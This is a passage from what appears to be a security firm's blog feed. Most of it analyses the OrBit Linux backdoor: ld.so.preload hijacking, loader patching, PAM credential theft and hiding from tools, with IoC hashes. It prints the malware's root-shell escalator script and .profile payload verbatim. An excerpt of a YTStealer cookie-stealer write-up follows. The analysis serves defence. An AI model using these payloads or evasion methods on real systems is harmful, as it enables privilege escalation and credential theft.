&lt;p&gt;The dropper installs the payload and prepares the environment for the malware
execution. The malware can be installed as a volatile module or with
persistence capabilities. It receives command line arguments and based on them
it extracts the payload to one of the locations. Using the command line
arguments the installation path can be swapped and the content of the payload
can be updated or entirely uninstalled. From here on in the report, we will
simply use &lt;code&gt;MALWARE_FOLDER&lt;/code&gt; as referring to the location where the malware has
been installed.&lt;/p&gt;
&lt;p&gt;To install the payload and add it to the shared libraries that are being loaded
by the dynamic linker, the dropper calls a function called &lt;code&gt;patch_ld&lt;/code&gt;. First,
it reads the symbolic link of the dynamic linker &lt;code&gt;/lib64/ld-linux-x86-64.so.2&lt;/code&gt;
and checks if the malicious payload is already loaded by searching for the path
used by the malware. If it is found the function can swap it with the other
location. Otherwise, it looks for &lt;code&gt;/etc/ld.so.preload&lt;/code&gt; and replaces it with a
symbolic link to the location of malicious library: &lt;code&gt;/lib/libntpVnQE6mk/.l&lt;/code&gt; or
&lt;code&gt;/dev/shm/ldx/.l&lt;/code&gt; (depending on the on the argument passed to the dropper).
Lastly, it will append &lt;code&gt;/etc/ld.so.preload&lt;/code&gt; to the end of the temp file to make
sure that the malicious library will be loaded first.&lt;/p&gt;
&lt;p&gt;Before it loads the malicious library to the dynamic linker, the dropper makes
sure to save a copy of the legitimate dynamic linker into
&lt;code&gt;MALWARE_FOLDER/.backup_ld.so&lt;/code&gt; so it if needed it can restore the environment
and to use the legitimate data to hide the malware (more about in the next
section).&lt;/p&gt;
&lt;p&gt;The preparation of the environment is achieved by setting a unique group ID
(GID) to the path that is used by the malware. In the sample we analyzed the
value is &lt;code&gt;0xE0B2E&lt;/code&gt;, the same GID will be used by the payload. In addition, the
dropper copies &lt;code&gt;python&lt;/code&gt; (from &lt;code&gt;/usr/bin/python&lt;/code&gt;) to the &lt;code&gt;MALWARE_FOLDER&lt;/code&gt; and
creates 4 additional files that will be used by the malware:&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;/lib/libntpVnQE6mk/.logpam
/lib/libntpVnQE6mk/sshpass.txt
/lib/libntpVnQE6mk/sshpass2.txt
/lib/libntpVnQE6mk/.ports&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;And the dropper writes the following 2 files, to grant the threat actors remote
access.&lt;/p&gt;
&lt;p&gt;The payload below is saved in &lt;code&gt;MALWARE_FOLDER/bin/escalator&lt;/code&gt;&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;import os
os.setreuid(0,0)
os.execv(&amp;#34;/bin/bash&amp;#34;, (&amp;#34;/bin/bash&amp;#34;, &amp;#34;-i&amp;#34;))&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;The payload below is saved in &lt;code&gt;MALWARE_FOLDER/.profile&lt;/code&gt;&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;#!/bin/bash
if [ &amp;#34;$(id -u)&amp;#34; -ne 0 ] ; then
echo &amp;#34;Welcome to $(hostname). You are GID $(id -g), UID $(id -u) and about to be escalated to UID 0.&amp;#34;
exec ~/bin/python ~/bin/escalator
fi&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;h3&gt;The OrBit Payload&lt;span class="hx:absolute hx:-mt-20" id="the-orbit-payload"&gt;&lt;/span&gt;
&lt;a href="#the-orbit-payload" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2022/07/orbit-new-undetected-linux-threat/images/fig2.png" title="The payload sample on VT ac89d638cb6912b58de47ac2a274b2fb" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;The payload sample on VT ac89d638cb6912b58de47ac2a274b2fb&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;The payload is a shared object (.SO file) that can be placed either in
persistent storage, for example &lt;code&gt;/lib/libntpVnQE6mk/&lt;/code&gt;, or in shim-memory under
&lt;code&gt;/dev/shm/ldx/&lt;/code&gt;. If it&amp;rsquo;s placed in the first path the malware will be
persistent, otherwise it is volatile.&lt;/p&gt;
&lt;p&gt;The shared object hooks functions from 3 libraries: libc, libcap and Pluggable
Authentication Module (PAM). Existing processes that use these functions will
essentially use the modified functions, and new processes will be hooked with
the malicious library as well, allowing the malware to infect the whole machine
and harvest credentials, evade detection, gain persistence and provide remote
access to the attackers.&lt;/p&gt;
&lt;p&gt;When implementing the hooking of libc functions it first calls &lt;code&gt;syscall&lt;/code&gt; with
the corresponding system call number as can be seen in the screenshot below.
Strings are obfuscated with simple XOR with a hardcoded key.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2022/07/orbit-new-undetected-linux-threat/images/fig3.png" title="Hooked stat function in the malware" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Hooked stat function in the malware&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;h4&gt;SSH connection&lt;span class="hx:absolute hx:-mt-20" id="ssh-connection"&gt;&lt;/span&gt;
&lt;a href="#ssh-connection" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;p&gt;One of the capabilities of the malware is to set up a remote connection on the
machine, it hooks 3 functions in the Pluggable Authentication Module library:
&lt;code&gt;pam_open_session&lt;/code&gt;, &lt;code&gt;pam_authenticate&lt;/code&gt; and &lt;code&gt;pam_acct_mgmt&lt;/code&gt;. By hooking these
functions the malware is capable of stealing information from SSH connections
and providing remote access to the attackers and hiding the network activity.&lt;/p&gt;
&lt;p&gt;When the hooked &lt;code&gt;pam_authenticate&lt;/code&gt; is called it checks if the user name and the
password equal to hardcoded values, and if that&amp;rsquo;s the case it will log the port
that is used for the connection in &lt;code&gt;/lib/libntpVnQE6mk/.ports&lt;/code&gt; and open the SSH
connection. In other cases, it will check if the file
&lt;code&gt;/lib/libntpVnQE6mk/.logpam&lt;/code&gt; exists (in the sample we analyzed it was created
by the dropper) and if so it will log the credentials to a file
&lt;code&gt;/lib/libntpVnQE6mk/sshpass.txt&lt;/code&gt;. Essentially the first file serves as a flag.&lt;/p&gt;
&lt;h4&gt;OrBit&amp;rsquo;s evasion techniques&lt;span class="hx:absolute hx:-mt-20" id="orbits-evasion-techniques"&gt;&lt;/span&gt;
&lt;a href="#orbits-evasion-techniques" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;p&gt;To evade detection the malware hooks multiple functions to prevent them from
outputting information that might reveal the existence of the malicious shared
library in the running processes or the files that are being used by the
malware. The malware uses a hardcoded GID value (the one set by the dropper) to
identify the files and processes that are related to the malware and based on
that it will manipulate the behavior of the hooked functions. For example,
&lt;code&gt;readdir&lt;/code&gt; is hooked to check the GID of the calling process, if it doesn&amp;rsquo;t
match the hardcoded value, all of the directories with the predefined GID value
will be omitted from the function&amp;rsquo;s output.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2022/07/orbit-new-undetected-linux-threat/images/fig4.png" title="Call getgid system call to check the GID of the process" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Call getgid system call to check the GID of the process&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;The malware hooks functions that open files: &lt;code&gt;fopen&lt;/code&gt;, &lt;code&gt;open&lt;/code&gt;, &lt;code&gt;open64&lt;/code&gt;, and
&lt;code&gt;openat&lt;/code&gt; and checks if the file that was provided to the relevant open function
is part of the proc file system. One of the paths that is being checked is
&lt;code&gt;/proc/net/tcp&lt;/code&gt; as it can disclose the network traffic generated by the
backdoor. The way in which the malware handles the output of this file is
similar to other files that are being opened and resembles the implementation
in Symbiote. The hooked function reads the content of the file and compares the
content, one line at a time to the content of &lt;code&gt;MALWARE_FOLDER/.ports&lt;/code&gt; which
holds the information about port and addresses used by the malware. The malware
creates a temp file and writes only the lines that don&amp;rsquo;t expose the malware.
Once the file has proceeded, the malware returns the file descriptor to the
temp file to the caller.&lt;/p&gt;
&lt;p&gt;The following
&lt;a href="https://man7.org/linux/man-pages/man5/proc.5.html#:~:text=where%20it%20resides.-,%2Fproc%2F%5Bpid%5D%2Fmaps,-A%20file%20containing"target="_blank" rel="noopener"&gt;file paths&lt;/a&gt;
show the currently mapped memory regions and their access permissions:&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;/proc/%PID%/maps
/proc/%PID%/smaps
/proc/%PID%/numa_maps&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;When a process accesses one of these files it may disclose the shared library,
therefore the hooked open functions verify that the output doesn&amp;rsquo;t contain a
path to the directory used by the malware, in a similar way as described above.&lt;/p&gt;
&lt;p&gt;Another file in the proc filesystem that is being checked is &lt;code&gt;/proc/loadavg&lt;/code&gt;.
This file is used by utilities such as &lt;code&gt;uptime&lt;/code&gt;, it provides information about
the CPU usage and the status of currently running processes. The malware will
process the information from this file in a similar way as the previous files.&lt;/p&gt;
&lt;p&gt;The malware hooks &lt;code&gt;execve&lt;/code&gt; to evade detection of certain utilities, control the
behavior of processes and to maintain its persistence by infecting new
processes. The hooking logic checks the process name and path and compares it
to different usulites in &lt;code&gt;/bin&lt;/code&gt;, &lt;code&gt;/usr&lt;/code&gt; and &lt;code&gt;/sbin&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;The hooked &lt;code&gt;execve&lt;/code&gt; function is used by the malware to hide the network
activity, the malware checks if the new process is &lt;code&gt;ip&lt;/code&gt; or &lt;code&gt;iptables&lt;/code&gt; utility
(it checks both the &lt;code&gt;/usr/sbin&lt;/code&gt; and &lt;code&gt;/sbin&lt;/code&gt;) it will first execute the command
and pipe the output to a local buffer where it will inspect the records and
check if there is a match between the records and the information stored in
&lt;code&gt;MALWARE_FOLDER/.net&lt;/code&gt; or &lt;code&gt;MALWARE_FOLDER/.fw&lt;/code&gt; – the record will be omitted from
the command&amp;rsquo;s output.&lt;/p&gt;
&lt;p&gt;When &lt;code&gt;execve&lt;/code&gt; is called with &lt;code&gt;dmesg&lt;/code&gt; the malware omits records that are equal
to the records in &lt;code&gt;MALWARE_FOLDER/.sys/.dmesg&lt;/code&gt;, and records that contain one of
the following keywords: zapping, &lt;code&gt;tcpdump&lt;/code&gt;, promiscuous, &lt;code&gt;libntpVnQE6mk&lt;/code&gt;,
&lt;code&gt;libdl.so&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;&lt;code&gt;execve&lt;/code&gt; checks if the function was called with the environment variable
&lt;a href="https://man7.org/linux/man-pages/man8/ld.so.8.html"target="_blank" rel="noopener"&gt;&lt;code&gt;LD_TRACE_LOADED_OBJECTS&lt;/code&gt;&lt;/a&gt;,
when this variable is set causes the program to list its dynamic dependencies.
The malware saves the original (unpatched) dynamic linker in a backup file, so
when &lt;code&gt;execve&lt;/code&gt; is called with this variable the output that will be presented is
as if the legitimate dynamic linker was called and it will not list the
malicious library. Essentially the following command is being executed:&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;MALWARE_FOLDER/.backup_ld --list %s&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;&lt;code&gt;strace&lt;/code&gt; is another utility that is being examined by the hooked &lt;code&gt;execve&lt;/code&gt;.
Because the output of &lt;code&gt;strace&lt;/code&gt; can reveal the malicious library as one of the
libraries that is being loaded by a traced process. &lt;code&gt;strace&lt;/code&gt; can be executed
with the &lt;code&gt;-o&lt;/code&gt; flag that specifies a file path to which the output will be
piped, if it&amp;rsquo;s not set in the command the malware will write the output of
&lt;code&gt;strace&lt;/code&gt; to &lt;code&gt;/tmp/.orbit&lt;/code&gt;. Similar to other utilities, the malware executes the
command and gets the result from the output file. Next it omits records that
contain the symlink one of the following: the malicious library
(&lt;code&gt;MALWARE_FOLDER/.l&lt;/code&gt;), the GID which is used by the malware (&lt;code&gt;920366&lt;/code&gt;) and its
folder path.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2022/07/orbit-new-undetected-linux-threat/images/fig5.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;h4&gt;Achieving Persistence&lt;span class="hx:absolute hx:-mt-20" id="achieving-persistence"&gt;&lt;/span&gt;
&lt;a href="#achieving-persistence" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;p&gt;The malware uses two methods to achieve persistence. The reason the malware
uses both of the methods is to make it hard removing the malware from an
infected machine while it&amp;rsquo;s running. The first method adds the path to the
malware into the &lt;code&gt;/etc/ld.so.preload&lt;/code&gt; configuration file. This instructs the
loader that the malware should be loaded first and for all new processes. In
the case this method is prevented by, for example removing the configuration
file on the infected machine, the malware has its second method which is
achieved by patching the loader binary.&lt;/p&gt;
&lt;p&gt;The malware first makes a copy of the loader&amp;rsquo;s binary so it can patch it. It
performs a simple search in the binary for the string &lt;code&gt;/etc/ld.so.preload&lt;/code&gt;.
Once it&amp;rsquo;s found, it replaces the string to a path to a file within the
&lt;code&gt;%MALWARE_FOLDER%&lt;/code&gt;. The content of this file has the path to the malware
library to act as a &lt;code&gt;ld.so.preload&lt;/code&gt; configuration file. This means when the
patch loader is executed, it uses the file in the &lt;code&gt;%MALWARE_FOLDER%&lt;/code&gt; instead
under &lt;code&gt;/etc&lt;/code&gt;. The malware author has set up these two methods to act as catches
in the case one of them goes away. For example, if an administrator wants to
stop the malware from being loaded by removing the configuration file under
&lt;code&gt;/etc&lt;/code&gt; so the hidden files can be revealed, the patched loader who doesn&amp;rsquo;t use
this file, will just load the malware who will recreate the configuration file.
If the administrator instead overwrites the patched loader with a clean
version, the clean loader loads the malware from the &lt;code&gt;ld.so.preload&lt;/code&gt;
configuration file which repatches the loader.&lt;/p&gt;
&lt;h4&gt;Information Stealing&lt;span class="hx:absolute hx:-mt-20" id="information-stealing"&gt;&lt;/span&gt;
&lt;a href="#information-stealing" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;p&gt;The backdoor hooks the &lt;code&gt;read&lt;/code&gt; and &lt;code&gt;write&lt;/code&gt; functions to log data that is being
written by the executed processes on the machine. The backdoor checks the flag:
&lt;code&gt;sniff_ssh_session&lt;/code&gt; that defines whether any call to &lt;code&gt;write&lt;/code&gt; will be logged or
only processes executed with &lt;code&gt;sudo&lt;/code&gt; or &lt;code&gt;ssh&lt;/code&gt; sessions. Appears that the
functionality of the flag doesn&amp;rsquo;t reflect the actual flow of the &lt;code&gt;write&lt;/code&gt;
function – when the flag is set to false the hooked function checks if the
process was executed with &lt;code&gt;sudo&lt;/code&gt; or if the calling process is &lt;code&gt;ssh&lt;/code&gt; and logs
the buffer that was passed to the original &lt;code&gt;write&lt;/code&gt; function, the data is stored
at: &lt;code&gt;MALWARE_FOLDER/sshpass2.txt&lt;/code&gt;. Otherwise when the flag is set to true, the
buffer is logged to &lt;code&gt;MALWARE_FOLDER/sniff.txt&lt;/code&gt; without verification of the
calling process name. Once the hooked function is done it will return the
return value of the original function call.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2022/07/orbit-new-undetected-linux-threat/images/fig6.png" title="Checking the flag sniff_ssh_session." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Checking the flag sniff_ssh_session.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;For &lt;code&gt;bash&lt;/code&gt; and &lt;code&gt;sh&lt;/code&gt; processes that call &lt;code&gt;execve&lt;/code&gt; the hook will log the &lt;code&gt;path&lt;/code&gt;
argument that holds the path to the file that will be executed as a new
process, the hooked function will append a timestamp and the full path and
write the information into &lt;code&gt;MALWARE_FOLDER/execlog&lt;/code&gt;.&lt;/p&gt;
&lt;h4&gt;Network Capabilities&lt;span class="hx:absolute hx:-mt-20" id="network-capabilities"&gt;&lt;/span&gt;
&lt;a href="#network-capabilities" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;p&gt;The backdoor hooks function from the libpcap library to hide network activity.
If hooks &lt;code&gt;bind&lt;/code&gt; and &lt;code&gt;connect&lt;/code&gt; functions to log the ports that are being used by
processes with the malwar&amp;rsquo;s gid, the ports are being written to
&lt;code&gt;MALWARE_FOLDER/.ports&lt;/code&gt;. The content of this file is used by the backdoor to
manage the ports that are being used in sessions that were opened by the
activity of the backdoor. When a new SSH session is created the port and IP
address is being written to the file.&lt;/p&gt;
&lt;p&gt;The malware hooks the &lt;code&gt;pcap_loop&lt;/code&gt; function and &lt;code&gt;pcap_packet_callback&lt;/code&gt; to filter
out the traffic of the backdoor. To accomplish this task the hooked
&lt;code&gt;pcap_packet_callback&lt;/code&gt; omits ports that are in &lt;code&gt;MALWARE_FOLDER/.ports&lt;/code&gt; as it
contains all of the ports used by the backdoor.&lt;/p&gt;
&lt;h2&gt;Comparing to other Linux threats&lt;span class="hx:absolute hx:-mt-20" id="comparing-to-other-linux-threats"&gt;&lt;/span&gt;
&lt;a href="#comparing-to-other-linux-threats" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;While it&amp;rsquo;s common for malware to hook functions, the usual technique is by
loading a shared library using &lt;code&gt;LD_PRELOAD&lt;/code&gt; – that was the case for Symbiote,
&lt;a href="../../../2019/05/hiddenwasp-malware-targeting-linux-systems"&gt;HiddenWasp&lt;/a&gt; and
other threats.&lt;/p&gt;
&lt;p&gt;This malware uses XOR encrypted strings and steals passwords – similar to other
Linux backdoors reported by
&lt;a href="https://www.welivesecurity.com/2013/01/24/linux-sshdoor-a-backdoored-ssh-daemon-that-steals-passwords/"target="_blank" rel="noopener"&gt;ESET&lt;/a&gt;.
But unlike other threats, this malware steals information from different
commands and utilities and stores them in specific files on the machine.
Besides, there is an extensive usage of files for storing data, something that
was not seen before.&lt;/p&gt;
&lt;p&gt;What makes this malware especially interesting is the almost hermetic hooking
of libraries on the victim machine, that allows the malware to gain persistence
and evade detection while stealing information and setting SSH backdoor.&lt;/p&gt;
&lt;h2&gt;Conclusion&lt;span class="hx:absolute hx:-mt-20" id="conclusion"&gt;&lt;/span&gt;
&lt;a href="#conclusion" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Threats that target Linux continue to evolve while successfully staying under
the radar of security tools, now OrBit is one more example of how evasive and
persistent new malware can be.&lt;/p&gt;
&lt;p&gt;I want to thank Joakim Kennedy for his contribution to this research.&lt;/p&gt;
&lt;h2&gt;IoCs&lt;span class="hx:absolute hx:-mt-20" id="iocs"&gt;&lt;/span&gt;
&lt;a href="#iocs" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Hash&lt;/th&gt;
&lt;th&gt;File&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;a href="https://analyze.intezer.com/files/f1612924814ac73339f777b48b0de28b716d606e142d4d3f4308ec648e3f56c8"target="_blank" rel="noopener"&gt;&lt;code&gt;f1612924814ac73339f777b48b0de28b716d606e142d4d3f4308ec648e3f56c8&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Dropper&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;a href="https://analyze.intezer.com/files/40b5127c8cf9d6bec4dbeb61ba766a95c7b2d0cafafcb82ede5a3a679a3e3020"target="_blank" rel="noopener"&gt;&lt;code&gt;40b5127c8cf9d6bec4dbeb61ba766a95c7b2d0cafafcb82ede5a3a679a3e3020&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Payload&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;</description></item><item><title>YTStealer Malware: "YouTube Cookies! Om Nom Nom Nom"</title><link>https://research.intezer.com/blog/2022/06/ytstealer-malware-youtube-cookies/</link><pubDate>Wed, 29 Jun 2022 00:00:00 +0000</pubDate><guid>https://research.intezer.com/blog/2022/06/ytstealer-malware-youtube-cookies/</guid><description>
&lt;h2&gt;The Stage: The Dark Web Market for YouTube Account Access&lt;span class="hx:absolute hx:-mt-20" id="the-stage-the-dark-web-market-for-youtube-account-access"&gt;&lt;/span&gt;
&lt;a href="#the-stage-the-dark-web-market-for-youtube-account-access" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;In 2006, the term
&lt;a href="https://ana.blogs.com/maestros/2006/11/data_is_the_new.html"target="_blank" rel="noopener"&gt;&amp;ldquo;data is the new oil&amp;rdquo;&lt;/a&gt;
was coined. Ever since then, the value of data has just increased. We live in a
world where many corporations collect data on users in an attempt to monetize
it. This is not just limited to legitimate corporations; the same occurs on the
Dark Web. With data, someone always wants to turn it into money. One thing
that&amp;rsquo;s interesting when it comes to the Dark Web is that a lot of these deals
are not happening behind closed doors. Instead, they are sometimes advertised
front and center on the forums.&lt;/p&gt;
&lt;p&gt;These Dark Web forums have become their own small economies where threat actors
specialize in specific services. This specialization has made it easier for
these threat actors to monetize what they are good at. We see this, especially
in the ransomware scene. There are specialized roles for people that gain
access to organizations, steal and encrypt data for the double extortion
effect, to ransom negotiators. Another hypothetical chain is: a threat actor
sells malware to another that uses the malware to steal data from an
organization. The data is sold to another that tries to convert the data into
cash. As you move along this chain, the amount of money exchanged usually
increases since each party wants to turn in a profit, but the risks also
increase. At some point, one of these threat actors must interact with the real
world to obtain the cash. This is when they are usually exposed, if they
haven&amp;rsquo;t already made other mistakes.&lt;/p&gt;
&lt;p&gt;In this blog post, we are describing a new malware that we have concluded is
highly likely sold as a service on the Dark Web. We have named the malware
YTStealer because its sole objective is to steal authentication cookies from
YouTube content creators. In June 2020,
&lt;a href="https://intsights.com/blog/stolen-youtube-credentials-growing-in-popularity-on-dark-web-forums"target="_blank" rel="noopener"&gt;IntSights&lt;/a&gt;
released a report on a new trend that they observed. In this trend, threat
actors were selling access to YouTube accounts. The goal of this write-up is to
share one of the many methods threat actors are using to obtain these accounts.&lt;/p&gt;
&lt;h2&gt;One Stealer, One Goal&lt;span class="hx:absolute hx:-mt-20" id="one-stealer-one-goal"&gt;&lt;/span&gt;
&lt;a href="#one-stealer-one-goal" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;YTStealer is a malware whose objective is to steal YouTube authentication
cookies. As a stealer, it operates like many other stealers. The first thing it
does when it&amp;rsquo;s executed is to perform some environment checks. This is to
detect if the malware is being analyzed in a sandbox. The code that performs
the checks comes from an open-source project hosted on GitHub called
&lt;a href="https://github.com/p3tr0v/chacal"target="_blank" rel="noopener"&gt;Chacal&lt;/a&gt;. Figure 1 shows a screenshot of the
project&amp;rsquo;s readme file. The framework is marketing itself for Red Teams and
pen-testers. It provides anti-debugging, anti-memory analysis, and anti-VM
functionality.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2022/06/ytstealer-malware-youtube-cookies/images/fig1.png" title="Figure 1: Part of Chacals README." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Figure 1: Part of Chacals README.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;What sets YTStealer aside from other stealers sold on the Dark Web market is
that it is solely focused on harvesting credentials for one single service
instead of grabbing everything it can get ahold of. When it comes to the actual
process, it is very similar to that seen in other stealers. The cookies are
extracted from the browser&amp;rsquo;s database files in the user&amp;rsquo;s profile folder.&lt;/p&gt;
&lt;p&gt;If YTStealer finds authentication cookies for YouTube, it does something
interesting though. To validate the cookies and to grab more information about
the YouTube user account, the malware starts one of the installed web browsers
on the infected machine in headless mode and adds the cookie to its cookie
store. By starting the web browser in headless mode, the malware can operate
the browser as if the threat actor sat down on the computer without the current
user noticing anything. To control the browser, the malware uses a library
called &lt;a href="https://go-rod.github.io"target="_blank" rel="noopener"&gt;Rod&lt;/a&gt;. Rod provides a high-level interface to
control browsers over the DevTools Protocol and markets itself as a tool for
